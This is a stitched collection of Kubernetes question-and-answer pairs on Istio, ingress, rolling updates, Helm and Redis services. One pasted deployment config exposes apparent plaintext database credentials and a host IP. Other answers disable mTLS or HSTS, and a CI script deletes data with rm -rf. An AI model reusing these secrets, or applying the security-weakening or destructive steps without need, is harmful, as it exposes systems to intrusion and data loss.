<p>I'm using a Kubernetes/Istio setup and my list of pods and services are as below:</p>
<pre><code>NAME READY STATUS RESTARTS AGE
hr--debug-deployment-86575cffb6-wl6rx 2/2 Running 0 33m
hr--hr-deployment-596946948d-jrd7g 2/2 Running 0 33m
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
hr--debug-service ClusterIP 10.104.160.61 <none> 80/TCP 33m
hr--hr-service ClusterIP 10.102.117.177 <none> 80/TCP 33m
</code></pre>
<p>I'm attempting to curl into <code>hr--hr-service</code> from <code>hr--debug-deployment-86575cffb6-wl6rx</code></p>
<pre><code>pasan@ubuntu:~/product-vick$ kubectl exec -it hr--debug-deployment-86575cffb6-wl6rx /bin/bash
Defaulting container name to debug.
Use 'kubectl describe pod/hr--debug-deployment-86575cffb6-wl6rx -n default' to see all of the containers in this pod.
root@hr--debug-deployment-86575cffb6-wl6rx:/# curl hr--hr-service -v
* Rebuilt URL to: hr--hr-service/
* Trying 10.102.117.177...
* Connected to hr--hr-service (10.102.117.177) port 80 (#0)
> GET / HTTP/1.1
> Host: hr--hr-service
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 403 Forbidden
< date: Thu, 03 Jan 2019 04:06:17 GMT
< server: envoy
< content-length: 0
<
* Connection #0 to host hr--hr-service left intact
</code></pre>
<p>Can you please explain why I'm getting a 403 forbidden by envoy and how I can troubleshoot it?</p>
| <p>If you have the envoy sidecar injected it really depends on what type of <a href="https://istio.io/docs/concepts/security/#authentication-policies" rel="nofollow noreferrer">authentication policy</a> you have between your services. Are you using a <code>MeshPolicy</code> or a <code>Policy</code>?</p>
<p>You can also try disabling authentication between your services to debug. Something like this (if your policy is defined like this):</p>
<pre><code>apiVersion: "authentication.istio.io/v1alpha1"
kind: "Policy"
metadata:
name: "hr--hr-service"
spec:
targets:
- name: hr--hr-service
peers:
- mTLS:
mode: PERMISSIVE
</code></pre>
|
<p>I have used external DNS with my load balancer. Now I have to print the output on my Gitlab console.</p>
<p>This is the service:</p>
<pre><code>test-dev-service-lb-http LoadBalancer 192.20.18.123 XXXXXXXXXXXXXXX-623196XX.us-east-1.elb.amazonaws.com 443:32479/TCP
</code></pre>
<p>Now I can get the ELB endpoint on the console by running a command: <code>kubectl get svc -o wide</code>. But I want to print the DNS attached to this ELB in Route 53 as well. </p>
<p>How to do that?</p>
| <p>Kubernetes doesn't have the knowledge of DNS records pointing to your LB.
You should use <a href="https://docs.aws.amazon.com/cli/latest/reference/route53/list-resource-record-sets.html" rel="nofollow noreferrer">AWS CLI</a> to get Route 53 records.</p>
|
<p>I am kubernetes newbie, and I have a basic question</p>
<p>my understanding from <a href="https://kubernetes.io/docs/reference/kubectl/conventions/" rel="nofollow noreferrer">https://kubernetes.io/docs/reference/kubectl/conventions/</a> is , we can generate yaml templates using "kubernetes run" command</p>
<p>But when I tried doing same, it didn't work
<a href="https://i.stack.imgur.com/xcsWO.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/xcsWO.png" alt="attachment"></a></p>
<p>Not sure if my understanding is wrong or something wrong in my command</p>
| <p>You're just missing a few flags.</p>
<p>The command should be </p>
<pre><code>kubectl run <podname> --image <imagename:tag> --dry-run -o yaml --generator=run-pod/v1
</code></pre>
<p>for example:</p>
<pre><code>kubectl run helloworld --image=helloworld --dry-run -o yaml --generator=run-pod/v1
</code></pre>
|
<p>We are moving towards Microservice and using K8S for cluster orchestration. We are building infra using Dynatrace and Prometheus server for metrics collection but they are yet NOT in good shape.
Our Java Application on one of the Pod is not working. I want to see the application logs.</p>
<p>How do I access these logs? </p>
| <p>Assuming the application logs to stdout/err, <code>kubectl logs -n namespacename podname</code>.</p>
|
<p>I'm new to gke/gcp and this is my first project.
I'm setting up istio using <a href="https://istio.io/docs/setup/kubernetes/quick-start-gke-dm/" rel="nofollow noreferrer">https://istio.io/docs/setup/kubernetes/quick-start-gke-dm/</a> tutorial.</p>
<p>I've exposed grafana as shown in the post using:<br>
<code>kubectl -n istio-system port-forward $(kubectl -n istio-system get pod -l app=grafana -o jsonpath='{.items[0].metadata.name}') 3000:3000 &
</code></p>
<p>curl <a href="http://localhost:3000/dashboard/db/istio-dashboard" rel="nofollow noreferrer">http://localhost:3000/dashboard/db/istio-dashboard</a>
gives me http page on terminal, to access it from the browser I'm using master ip I get after executing <code>kubectl cluster-info</code>.</p>
<p>http://{master-ip}:3000/dashboard/db/istio-dashboard is not accessible. </p>
<p>How do I access services using port-forward on gke?</p>
| <p>First grab the name of the Pod</p>
<pre><code>$ kubectl get pod
</code></pre>
<p>and then use the port-forward command. </p>
<pre><code>$ kubectl port-forward <pod-name> 3000:3000
</code></pre>
<p>It worked for me, I've found it from this <a href="https://medium.com/google-cloud/kubernetes-120-networking-basics-3b903f13093a" rel="nofollow noreferrer">nice</a> website also explained on detail how to do it. Hope it can be useful. </p>
|
<p>I am experiencing this issue. My application needs to receive connection under SSL only with WebSocket. HTTP requests should be forced to not being redirected. My ingress configuration is </p>
<pre><code>apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: in-camonline
namespace: cl5
annotations:
kubernetes.io/ingress.class: "nginx"
nginx.org/websocket-services: "svc-ws-api"
nginx.ingress.kubernetes.io/ssl-redirect: "false"
nginx.ingress.kubernetes.io/force-ssl-redirect: "false"
ingress.kubernetes.io/affinity: "ClientIP"
spec:
tls:
- hosts:
- foo.bar.com
secretName: cl5-secret
rules:
- host: foo.bar.com
http:
paths:
- path: /socket.io
backend:
serviceName: svc-ws-api
servicePort: 8000
- path: /
backend:
serviceName: svc-http-service
servicePort: 80
</code></pre>
<p>I also disabled the <code>ssl-redirect</code> globally adding an item into the ConfigMap</p>
<pre><code>kind: ConfigMap
apiVersion: v1
metadata:
name: nginx-configuration
namespace: ingress
labels:
app.kubernetes.io/name: ingress-nginx
app.kubernetes.io/part-of: ingress-nginx
data:
#use-proxy-protocol: "false"
ssl-redirect: "false"
</code></pre>
<p>Now if I do request using curl, requests won't being redirected. If I try to run my front-end application every request after the WSS will be forced to being redirected to use HTTPS </p>
<pre><code>Request URL: http://foo.bar.com/2/symbols
Request Method: OPTIONS
Status Code: 307 Internal Redirect
Referrer Policy: no-referrer-when-downgrade
</code></pre>
<p>Any suggestion about how to achieve that? </p>
| <p>Finally, I sorted it out. If someone is reading this, easy you are not alone!</p>
<p>Jokes aside, <code>nginx-controller</code> was setting header <code>Strict-Transport-Security</code> after the first HTTPS call (socket.io polling in my case). This header forces the browser to use TLS for the next requests. You can read more about this header here <a href="https://developer.mozilla.org/it/docs/Web/HTTP/Headers/Strict-Transport-Security" rel="nofollow noreferrer">https://developer.mozilla.org/it/docs/Web/HTTP/Headers/Strict-Transport-Security</a></p>
<p>What I did is to disable the option adding the entry <code>hsts: false</code> on the <code>ingress-controller</code>'s ConfigMap object.
You can find more here <a href="https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/configmap/#hsts" rel="nofollow noreferrer">https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/configmap/#hsts</a>
Hope this can help you :)</p>
|
<p>I want rollback deployment for my pods. I'm updating my pod using <code>set Image</code> in a CI environment. When I set maxUnavailable on Deployment/web file to 1, I get downtime. but when I set maxUnavailable to 0, The pods doesnot get replaced and container / app is not restarted. </p>
<p>Also I Have a single Node in Kubernetes cluster and Here's its info </p>
<pre><code> Allocated resources:
(Total limits may be over 100 percent, i.e., overcommitted.)
CPU Requests CPU Limits Memory Requests Memory Limits
------------ ---------- --------------- -------------
881m (93%) 396m (42%) 909712Ki (33%) 1524112Ki (56%)
Events: <none>
</code></pre>
<p>Here's the complete YAML file. I do have readiness Probe set. </p>
<pre><code> apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "10"
kompose.cmd: C:\ProgramData\chocolatey\lib\kubernetes-kompose\tools\kompose.exe
convert
kompose.version: 1.14.0 (fa706f2)
kubectl.kubernetes.io/last-applied-configuration: |
{"apiVersion":"extensions/v1beta1","kind":"Deployment","metadata":{"annotations":{"kompose.cmd":"C:\\ProgramData\\chocolatey\\lib\\kubernetes-kompose\\tools\\kompose.exe convert","kompose.version":"1.14.0 (fa706f2)"},"creationTimestamp":null,"labels":{"io.kompose.service":"dev-web"},"name":"dev-web","namespace":"default"},"spec":{"replicas":1,"strategy":{},"template":{"metadata":{"labels":{"io.kompose.service":"dev-web"}},"spec":{"containers":[{"env":[{"name":"JWT_KEY","value":"ABCD"},{"name":"PORT","value":"2000"},{"name":"GOOGLE_APPLICATION_CREDENTIALS","value":"serviceaccount/quick-pay.json"},{"name":"mongoCon","value":"mongodb://quickpayadmin:[email protected]:21343/quick-pay-db"},{"name":"PGHost","value":"173.255.206.177"},{"name":"PGUser","value":"postgres"},{"name":"PGDatabase","value":"quickpay"},{"name":"PGPassword","value":"z33shan"},{"name":"PGPort","value":"5432"}],"image":"gcr.io/quick-pay-208307/quickpay-dev-node:latest","imagePullPolicy":"Always","name":"dev-web-container","ports":[{"containerPort":2000}],"readinessProbe":{"failureThreshold":3,"httpGet":{"path":"/","port":2000,"scheme":"HTTP"},"initialDelaySeconds":5,"periodSeconds":5,"successThreshold":1,"timeoutSeconds":1},"resources":{"requests":{"cpu":"20m"}}}]}}}}
creationTimestamp: 2018-12-24T12:13:48Z
generation: 12
labels:
io.kompose.service: dev-web
name: dev-web
namespace: default
resourceVersion: "9631122"
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/web
uid: 5e66f7b3-0775-11e9-9653-42010a80019d
spec:
progressDeadlineSeconds: 600
replicas: 2
revisionHistoryLimit: 10
selector:
matchLabels:
io.kompose.service: web
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 0
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
io.kompose.service: web
spec:
containers:
- env:
- name: PORT
value: "2000"
image: gcr.io/myimagepath/web-node
imagePullPolicy: Always
name: web-container
ports:
- containerPort: 2000
protocol: TCP
readinessProbe:
failureThreshold: 10
httpGet:
path: /
port: 2000
scheme: HTTP
initialDelaySeconds: 10
periodSeconds: 10
successThreshold: 1
timeoutSeconds: 10
resources:
requests:
cpu: 10m
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
status:
availableReplicas: 2
conditions:
- lastTransitionTime: 2019-01-03T05:49:46Z
lastUpdateTime: 2019-01-03T05:49:46Z
message: Deployment has minimum availability.
reason: MinimumReplicasAvailable
status: "True"
type: Available
- lastTransitionTime: 2018-12-24T12:13:48Z
lastUpdateTime: 2019-01-03T06:04:24Z
message: ReplicaSet "dev-web-7bd498fc74" has successfully progressed.
reason: NewReplicaSetAvailable
status: "True"
type: Progressing
observedGeneration: 12
readyReplicas: 2
replicas: 2
updatedReplicas: 2
</code></pre>
<p>I've tried with 1 replica and it still doesnot work. </p>
| <p>In first scenario, Kubernetes deletes one pod (<code>maxUnavailable: 1</code>) and started the pod with new image and waits for ~110 seconds(based on your readiness probe) to check if new pod is able to serve request. New pod isn't able to serve requests but the pod is in running state and hence it delete the second old pod and started it with new image and again second pod waits for the readiness probe to complete. This is the reason there is some time in between where both the containers are not ready to serve request and hence the downtime.</p>
<p>In second scenario, where you have <code>maxUnavailable:0</code>, Kubernetes first brings up the pod with new image and it isn't able to serve the request in ~110 seconds(based on your readiness probe) and hence it times out and deletes the new pod with new image. Same happens with the second pod. Hence both your pod do not get updated</p>
<p>So the reason is that you are not giving enough time to your application to come up and start serving requests. You can increase the value of <code>failureThreshold</code> in your readiness probe and <code>maxUnavailable: 0</code>, it will work.</p>
|
<p>The command <code>helm history</code> prints a list of the past revisions for a release. Is there a limit to the size of this history? i.e. a number <code>n</code> such that if there are <code>n + 1</code> revisions then the first revision is no longer available? I'm aware of the <code>max</code> flag for the <code>helm history</code> command which limits the length of the list returned, so this question could be equivalently asked as: does the <code>max</code> flag have a limit for its value?</p>
<p>This is in the context of wanting to do a <code>helm rollback</code> - that command requires a revision and I want to confirm that there will never be a problem with Helm forgetting old revisions. </p>
<p>Thanks</p>
| <p>Yes. It does have a limit, if you look at the <a href="https://github.com/helm/helm/blob/master/cmd/helm/history.go#L61" rel="nofollow noreferrer">source code</a> (also <a href="https://github.com/helm/helm/blob/master/pkg/helm/option.go#L474" rel="nofollow noreferrer">here</a>) you see that it's defined as an <code>int32</code> in Golang.</p>
<p>Then, if you look at the <a href="https://golang.org/pkg/builtin/#int32" rel="nofollow noreferrer"><code>int32</code></a> docs for the builtin-types you see that it's range is <code>-2147483648</code> through <code>2147483647</code>. In theory, you can specify <code>--max</code> on the helm command line as a positive number so <code>2147483647</code> would be your limit. (Surprisingly, I don't see where the absolute value for the int32 gets generated)</p>
<p>The <a href="https://github.com/helm/helm/blob/8be42bae885a04b4acc242cf420911145b32ee1c/cmd/helm/history.go#L34" rel="nofollow noreferrer">releaseInfo</a> structure has a memory footprint, so if you have a lot of releases you will run into a limit depending on how much memory you have on your system.</p>
|
<p>I have a Kubernetes scenario where I will need to deploy 3 Redis servers (pods), and each needs to be exposed with a ClusterIP service. Something like;</p>
<ul>
<li>RedisClusterIP1 -> RedisPod1 </li>
<li>RedisClusterIP2 -> RedisPod2</li>
<li>RedisClusterIP3 -> RedisPod3</li>
</ul>
<p>I have deployment plan like below, but as you can see it is creating ClusterIP service manually, and binds single of them to all pods.</p>
<p>Is there any way to set a deployment plan, there it will create same amount of services with Pods?</p>
<p>I checked <a href="https://kubernetes.io/docs/concepts/workloads/controllers/deployment/" rel="nofollow noreferrer">deployments</a> and <a href="https://kubernetes.io/docs/concepts/workloads/controllers/replicaset/" rel="nofollow noreferrer">replica sets</a> but could not figure out if there is something already exists.</p>
<pre><code>apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: redisharedis
spec:
replicas: 3
template:
metadata:
labels:
app: redisharedis
spec:
containers:
- name: redisharedis
image: aozdemir/redisharedis:v6
resources:
limits:
cpu: "1"
memory: "800Mi"
requests:
cpu: "0.1"
memory: "200Mi"
ports:
- containerPort: 6379
---
apiVersion: v1
kind: Service
metadata:
name: redisharedis-service
labels:
name: redisharedis-service
spec:
ports:
- port: 6379
targetPort: 6379
protocol: TCP
selector:
app: redisharedis
type: ClusterIP
</code></pre>
| <p>This can be done If you're deploying your redis cluster as <code>Statefulset</code> rather than <code>deployment</code>. In Kubernetes 1.9+, StatefulSet automatically adds the Pod name as a label on each of its Pods, so you can enable Service-Per-Pod like this:</p>
<pre><code>apiVersion: apps/v1beta2
kind: StatefulSet
metadata:
annotations:
service-per-pod-label: "statefulset.kubernetes.io/pod-name"
service-per-pod-ports: "80:8080"
</code></pre>
<p>You need to install <code>MetaController</code> in your kubernetes cluster to install one service per pod. Please refer following link for detailed instructions:</p>
<blockquote>
<p><a href="https://github.com/GoogleCloudPlatform/metacontroller/tree/master/examples/service-per-pod" rel="noreferrer">https://github.com/GoogleCloudPlatform/metacontroller/tree/master/examples/service-per-pod</a></p>
</blockquote>
|
<p>I've installed a Kubernetes cluster using Rancher on 5 different CentOS nodes (let's say node1, node2, ..., node5). For our CI run, we need to clean up stale docker images before each run. I created a script that runs on node1, and password-less ssh is enabled from node1 to rest of the nodes. The relevant section of the script looks something like below:</p>
<pre><code>#!/bin/bash
helm ls --short --all | xargs -L1 helm delete --purge
echo "Deleting old data and docker images from Rancher host node."
rm -rf /var/lib/hadoop/* /opt/ci/*
docker images | grep localhost | awk '{print $3}' | xargs docker rmi -f
hosts=(node2 node3 node4 node5)
for host in ${hosts[*]}
do
echo "Deleting old data and docker images from ${host}"
ssh root@${host} docker images | grep localhost | awk '{print $3}' | xargs docker rmi -f
ssh root@${host} rm -rf /var/lib/hadoop/* /opt/ci/*
done
echo "All deletions are complete! Proceeding with installation."
sleep 2m
</code></pre>
<p>Problem is, while the <code>docker rmi</code> command inside the for loop runs for all other 4 nodes, I get the error <code>Error: No such image: <image-id></code> for each of the images. But if I execute same command on that node, it succeeds. I'm not sure what's the issue here. Any help is appreciated.</p>
| <p>The problem is that the only the first command in the ssh pipe is executed remotely:</p>
<pre><code>ssh root@${host} docker images | grep localhost | awk '{print $3}' | xargs docker rmi -f
</code></pre>
<p>Shell understand that it is</p>
<pre><code>ssh ssh-arguments | grep grep-arguments | awk awk-arguments | xarg xarg-arguments
</code></pre>
<p>And the result is that the only <code>docker images</code> is executed remotely. Then the output from the remote <code>docker images</code> is transferred to the local machine where it is filtered by <code>grep</code> and <code>awk</code> and then <code>docker rmi</code> is executed on local machine.</p>
<p>It is necessary to add quotes to inform shell that everything at command line is a ssh argument:</p>
<pre><code>ssh root@${host} "docker images | grep localhost | awk '{print $3}' | xargs docker rmi -f"
</code></pre>
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.